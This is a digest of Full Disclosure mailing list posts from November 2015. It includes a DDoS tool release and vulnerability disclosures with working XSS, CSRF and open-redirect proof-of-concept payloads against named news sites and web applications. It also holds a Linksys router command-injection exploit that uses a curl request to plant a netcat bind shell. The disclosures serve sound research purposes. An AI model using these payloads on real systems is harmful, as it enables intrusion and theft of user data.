[FD] Winehat Security Conference

2015-11-02 Thread Lorenzo Primiterra 
Hi all,
if nobody has already posted it, I would like to link this new security
event, witch is going to be held in Italy but all in English, bringing
together the Italian culture (food, wine, culture) and the InfoSec world.

It will be held in Turin on November 7th and 8th in the Italian Association
of Sommeliers of Piedmont.

The agenda is looking good with speakers from Europe and USA:Dean Sysman,
Philippe Langlois, Michele "antisnatchor" Orru', Matteo Mazzeri, GentilKiwi
and Raoul Chiesa, who seems to be one of the organizers.

The event will be totally free, otherwise I wouldn't have linked it!

Lorenzo.

PS: The website is http://winehat.net

-- 
*Lorenzo Primiterra - mobile developer*
IT number: (+39) 340 5031306 | UK number: (+44) 7807883914
personal website: http://lorenzo.primiterra.it
[image: Twitter]  [image: LinkedIn]
 [image: Skype]
nuke88

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DAVOSET v.1.2.6

2015-11-02 Thread MustLive 

Hello participants of Mailing List.

After making public release of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html),
I've made next update of the software. At 30th of October DAVOSET v.1.2.6
was released - DDoS attacks via other sites execution tool
(http://websecurity.com.ua/davoset/).

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

GitHub: https://github.com/MustLive/DAVOSET

Download DAVOSET v.1.2.6:

http://websecurity.com.ua/uploads/2015/DAVOSET_v.1.2.6.rar

In new version there was added support of comments in the lists. Also there
were added XXE Injection in NetIQ Access
(http://seclists.org/fulldisclosure/2015/Jun/103) to the list and added
support of XML requests via GET (e.g. for NetIQ Access). And removed
non-working services from full list of zombies.

In total there are 155 zombie-services in the list.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Daily Mail Registration Page Unvalidated Redirects and Forwards & XSS Web Security Problem

2015-11-02 Thread Jing Wang 
*Daily Mail Registration Page Unvalidated Redirects and Forwards & XSS Web
Security Problem*


*Website Description:*
"The Daily Mail is a British daily middle-market tabloid newspaper owned by
the Daily Mail and General Trust. First published in 1896 by Lord
Northcliffe, it is the United Kingdom's second biggest-selling daily
newspaper after The Sun. Its sister paper The Mail on Sunday was launched
in 1982. Scottish and Irish editions of the daily paper were launched in
1947 and 2006 respectively. The Daily Mail was Britain's first daily
newspaper aimed at the newly-literate "lower-middle class market resulting
from mass education, combining a low retail price with plenty of
competitions, prizes and promotional gimmicks", and was the first British
paper to sell a million copies a day. It was at the outset a newspaper for
women, the first to provide features especially for them, and as of the
second-half of 2013 had a 54.77% female readership, the only British
newspaper whose female readers constitute more than 50% of its demographic.
It had an average daily circulation of 1,708,006 copies in March 2014.
Between July and December 2013 it had an average daily readership of
approximately 3.951 million, of whom approximately 2.503 million were in
the ABC1 demographic and 1.448 million in the C2DE demographic. Its website
has more than 100 million unique visitors per month." (Wikipedia)


One of its website's Alexa rank is 93 on January 01 2015. The website is
one of the most popular websites in the United Kingdom.


The Unvalidated Redirects and Forwards problem has not been patched, while
the XSS problem has been patched.



Discover and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Daily mail Registration Page Unvalidated Redirects and Forwards Web
Security Problem*


*(1.1) Vulnerability Description:*
Daily online websites have a cyber security problem. Hacker can exploit it
by Open Redirect (Unvalidated Redirects and Forwards) attacks. During the
tests, all Daily mail websites (Daily Mail, Mail on Sunday & Metro media
group) use the same mechanism. These websites include dailymail.co.uk,
thisismoney.co.uk, and mailonsunday.co.uk.




Google Dork:
"Part of the Daily Mail, The Mail on Sunday & Metro Media Group"



The vulnerability occurs at "&targetUrl" parameter in "logout.html?" page,
i.e.
http://www.dailymail.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fgoogle.com





*(1.2.1) *Use the following tests to illustrate the scenario painted above.

The redirected webpage address is "http://diebiyi.com/articles";. Can
suppose that this webpage is malicious.

Vulnerable URLs:
http://www.dailymail.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdailymail.co.uk
http://www.thisismoney.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fhao123.com/
http://www.mailonsunday.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fpinterest.com


POC Code:
http://www.dailymail.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdiebiyi.com/articles
http://www.thisismoney.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdiebiyi.com/articles
http://www.mailonsunday.co.uk/registration/logout.html?targetUrl=http%3A%2F%2Fdiebiyi.com/articles




*POC Video:*
https://www.youtube.com/watch?v=AU-HJGe5BWE&feature=youtu.be



*Blog Details:*
http://tetraph.com/security/website-test/daily-mail-url-redirection/
http://securityrelated.blogspot.com/2015/10/daily-mail-registration-page.html





*(1.2.2)* The program code flaw can be attacked without user login. Tests
were performed on Microsoft IE (9 9.0.8112.16421) of Windows 8, Mozilla
Firefox (37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu
(14.04.2),and Apple Safari 6.1.6 of Mac OS X v10.9 Mavericks.

These bugs were found by using URFDS (Unvalidated Redirects and Forwards
Detection System).





*(1.2) Description of Open Redirect:*
Here is the description of Open Redirect: "A web application accepts a
user-controlled input that specifies a link to an external site, and uses
that link in a Redirect. This simplifies phishing attacks. An http
parameter may contain a URL value and could cause the web application to
redirect the request to the specified URL. By modifying the URL value to a
malicious site, an attacker may successfully launch a phishing scam and
steal user credentials. Because the server name in the modified link is
identical to the original site, phishing attempts have a more trustworthy
appearance." (From CWE)




*(1.3) Vulnerability Disclosure:*
These vulnerabilities have not been patched.








*(2) Daily Mail Website XSS Cyber Security Zero-Day Vulnerability*


*(2.1) Vulnerability description:*
DailyMail has a security problem. Criminals can exploit it by XSS attacks.

The vulnerability occurs at "reportAbuseInComment.html?" page with
"&commentId" parame

[FD] TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks

2015-11-02 Thread Jing Wang 
*TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber
Attacks*


*Website Description:*
http://www.telegraph.co.uk


"The Daily Telegraph is a British daily morning English-language broadsheet
newspaper, published in London by Telegraph Media Group and distributed
throughout the United Kingdom and internationally. The newspaper was
founded by Arthur B. Sleigh in June 1855 as The Daily Telegraph and
Courier, and since 2004 has been owned by David and Frederick Barclay. It
had a daily circulation of 523,048 in March 2014, down from 552,065 in
early 2013. In comparison, The Times had an average daily circulation of
400,060, down to 394,448. The Daily Telegraph has a sister paper, The
Sunday Telegraph, that was started in 1961, which had circulation of
418,670 as of March 2014. The two printed papers currently are run
separately with different editorial staff, but there is cross-usage of
stories. News articles published in either, plus online Telegraph articles,
may also be published on the Telegraph Media Group's www.telegraph.co.uk
website, all under The Telegraph title." (From Wikipedia)




Discoved and Disclosured By:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Vulnerability Description:*
Telegraph has a Web security bug problem. It is vulnerable to XSS attacks.
In fact, all its photo pages are vulnerable to XSS (Cross-Site Scripting)
vulnerabilities. Telegraph's picture pages use "&frame" as its parameter.
All its web pages use "&frame" are vulnerable to the bugs. Those
vulnerabilities have been patched now.


*Examples of Vulnerable Links:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278



*POC Code:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095";>
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162";>
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280";>
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790";>
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278";>


The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 7. The
bugs found by using CSXDS.




*(2) XSS Description:*
The description of XSS is: "Cross-Site Scripting (XSS) attacks are a type
of injection, in which malicious scripts are injected into otherwise benign
and trusted web sites. XSS attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it."
(OWSAP)




*Poc Video:*
https://www.youtube.com/watch?v=SqjlabJ1OzA&feature=youtu.be





*Blog Details:*
http://www.tetraph.com/security/website-test/telegraph-xss/
http://securityrelated.blogspot.com/2015/10/telegraph-xss-0day.html





*(3) Vulnerability Disclosure:*
These vulnerabilities have been patched now.





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Cross-Site Scripting | Zeuscart V4

2015-11-02 Thread ITAS Team 
#Vulnerability: Cross-Site Scripting
#Vendor: http://www.zeuscart.com
#Download link: http://zeuscart.com/download/
#Affected version: Zeuscart V4
#CVSS v3.0 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
#Condition: The attack is performed by an "Anonymous User"
#Payload: "-->alert(/ITASVN/)
#Fix version: N/A
#Author: Dang Quoc Thai – thai.q.d...@itas.vn và ITAS Team

::PROOF OF CONCEPT::
+ REQUEST
GET
/index.php?do=search&search=%22--%3E%3CScRipt%3Ealert(/ITASVN/)%3C/ScRipT%3E
HTTP/1.1
Host: demo.target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.target.com/demo/
Cookie: PHPSESSID=0f9ce01d2822471dee23af07947e9074
Connection: keep-alive

+RESPONSE
HTTP/1.1 200 OK
Date: Mon, 02 Nov 2015 02:21:55 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips
mod_bwlimited/1.4
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25032
...




http://demo.target.com/index.php?do=index";>http://demo.target.com/images/logo/20151012210547_sell_logo.png";
alt="ZeusCart">


alert(/ITASVN/)"
onclick="searchitem();"> 
Search

http://demo.target.com/index.php?do=showcart";>Shopping Cart - 0 Items

http://www.itas.vn/en/itas-team-found-out-a-cross-site-scripting-vulnerabili
ty-in-zeuscart-cms/ 
- https://www.youtube.com/watch?v=CPgzAra_mXw  


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2015-6498

2015-11-02 Thread csirt 
###
#
# SWISSCOM CSIRT ADVISORY - 
https://www.swisscom.ch/en/about/sustainability/digital-
#switzerland/security.html
#
##
#
# CVE ID:   CVE-2015-6498
# Product:  Home Device Manager
# Vendor:   Alcatel-Lucent
# Subject:  Code vulnerability, remotely exploitable
# Finder:   Dr. Ulrich Fiedler and his team at BFH-TI Biel/Bienne
# Coord:Philippe Cuany (csirt _at_ swisscom.com)
# Date: Nov 02nd 2015
#
##


Description
---
A vulnerability has been discovered in the TR069 protocol that can potentially
affect all Automatic Configuration Servers (ACS). The issue has been fixed in
the Home Device Manager (HDM) product from Alcatel-Lucent with an anti-spoofing
filter.  HDM allows service providers to remotely manage CPEs, such as
residential gateways, IP set-top boxes, and VoIP terminal adapters that comprise
a home networking environment.


Product
---
Alcatel-Lucent Home Device Manager, version prior to 4.1.10 may be affected if
they have no filtering in place, which was provided as a customer specific
extension already by Alcatel-Lucent, or have foreseen other additional
authorization checks.


Vulnerability
-
The vulnerability allows an attacker to perform impersonation attacks by
spoofing CPE using tr-069 (cwmp) Protocol. An attacker could gain unauthorized
access to third-party SIP Credentials for the spoofed device and perform illegal
activities (phone fraud). The vulnerability has been tested and confirmed.


Remediation
---
Update to Home Device Manager Version 4.1.10 (or higher) or 4.2.2 (or higher)
and activate the anti-spoofing filters, in case there is not already a customer
specific filter or authorization check in place.


Acknowledgments
---
Dr. Ulrich Fiedler and his team at BFH-TI Biel/Bienne for the discovery and
notification about the vulnerability.


Milestones
--
Jul 13th 2015 Details about the vulnerability are communicated to Swisscom
Jul 14th 2015 HDM anti-spoffing filter available
Aug 13th 2015 CVE ID requested at MITRE
Aug 18th 2015 CVE ID 2015-6498 assigned by MITRE
Nov 02nd 2015 Public Release of Advisory



smime.p7s
Description: S/MIME Cryptographic Signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Chyrp CMS 2.5.2: XSS

2015-11-02 Thread Curesec Research Team (CRT) 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Chyrp CMS 2.5.2
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Github:   https://github.com/chyrp/chyrp
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability in Chyrp CMS 2.5.2. With this, it is possible to
steal cookies, bypass CSRF protection, or inject JavaScript keyloggers.

The vulnerability exists because the key of all GET arguments is echoed without
encoding.

3. Proof of Concept


http://localhost/chyrp/themes/firecrest/images/dots-green.gif?";>alert(1)=1

4. Code


/includes/class/Theme.php:231
public function javascripts() {
$config = Config::current();
$route = Route::current();

$args = "";
foreach ($_GET as $key => $val)
if (!empty($val) and $val != $route->action)
$args.= "&".$key."=".urlencode($val);

$javascripts = 
array($config->chyrp_url."/includes/lib/gz.php?file=jquery.js",
 
$config->chyrp_url."/includes/lib/gz.php?file=plugins.js",
 
$config->chyrp_url.'/includes/javascript.php?action='.$route->action.$args);

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Chyrp-CMS-252-XSS-61.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SQL Buddy 1.3.3: XSS

2015-11-02 Thread Curesec Research Team (CRT) 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:SQL Buddy 1.3.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Contact:  n...@deliciousbrains.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  08/18/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "requestKey" GET parameter in SQL Buddy
1.3.3. With this, it is possible to steal cookies or inject JavaScript
keyloggers.

Please note that the POC only works if the victim is not logged in.

3. Proof of Concept


http://localhost/sqlbuddy/index.php?ajaxRequest=1&requestKey=";>alert(1)

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/18/2015 Informed Vendor about Issue (no reply)
09/16/2015 Reminded Vendor of release date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/SQL-Buddy-133-XSS-60.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SQL Buddy 1.3.3: CSRF

2015-11-02 Thread Curesec Research Team (CRT) 
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:SQL Buddy 1.3.3
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Contact:  n...@deliciousbrains.com
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  08/18/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

None of the forms of SQL Buddy 1.3.3 have proper CSRF protection, which means
that an attacker can perform actions for the victim if the victim visits an
attacker controlled site while logged in.

While SQL Buddy does have CSRF protection, it does not work properly. If a CSRF
token is sumbitted, it has to be correct. However, if no token is submitted,
the check is passed as well.

3. Proof of Concept

Insert a new MySQL user:


http://localhost/sqlbuddy/query.php?ajaxRequest=2807&db=foo"; >


document.myform.submit();

4. Code


functions.php:215
function validateRequest() {
global $requestKey;
if (isset($_GET['requestKey']) && $_GET['requestKey'] != 
$requestKey) {
return false;
}
return true;
}

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

08/18/2015 Informed Vendor about Issue (no reply)
09/16/2015 Reminded Vendor of release date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/SQL-Buddy-133-CSRF-59.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unauthenticated remote command execution on Cisco Linksys x2000 routers

2015-11-02 Thread Lorenzo Pistone 

Hello,
I have found on my router, a Linksys X2000, that there is a poor 
validation of the IP target in the ping diagnostics web page 
(http://$router_ip/Diagnostics.asp). This can be used to execute 
arbitrary commands as the root user on the device. It appears that there 
is no need for authentication to exploit the flaw, so this is 
exploitable from WAN if the administrator has activated remote 
management from the web UI.


The web interface is managed by process /bin/httpd. The diagnostic web 
pages accepts an user-supplied IP to run a ping test on it. This user 
value is truncated at the first occurrence of the characters " ;<>" in 
an attempt to make the user-provided string safe when appended to 
"/bin/ping " and passed to system(). However, this is not sufficient at 
all to prevent the injection of shell commands. In fact, spaces for 
arguments separation can be replaced by tabs and semicolons with new 
lines. This allows arbitrary remote command execution with root privileges.


To exacerbate the issue, it appears that there is no need for any 
authentication to trigger the ping diagnostic. I have tested this on LAN 
and it works. Regarding remote access, I failed to get remote access to 
work at all, because for some reason when I enable it a rule to the nat 
table is inserted to drop packets directed to the web interface, before 
the rule that honors the "Remote Management Port" field in the web 
configuration. I do not know why this happens and if it is intended 
behavior. However, by using the root shell from LAN to remove this 
iptables entry, I could successfully exploit the flaw from WAN too.


This is the POC:

   #activate the shellby requesting a ping test to a special ip string
   ("busybox nc -e /bin/sh -l -p 1234")
   curl -s \
  --data submit_button=Diagnostics \
  --data change_action=gozila_cgi \
  --data submit_type=start_ping \
  --data action= \
  --data commit=0 \
  --data nowait=1 \
  --data ping_size=32 \
  --data ping_times=5 \
  --data-urlencode
   ping_ip=$'\nbusybox\tnc\t-e\t/bin/sh\t-l\t-p\t1234'
   $router_ip/apply.cgi >/dev/null &
   #access the shell
   nc $router_ip 1234
   #now can execute any non-interactive shell command

I suspect that there are similar issues with the traceroute diagnostic, 
and in adding port forwarding entries. A more blog-y description of the 
issue, including the assembly locations that fail to properly sanitize 
the user value, can be found here 
http://meat.pisto.horse/2015/11/rooting-linksys-x2000-router-system.html


Cheers.
Lorenzo Pistone

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/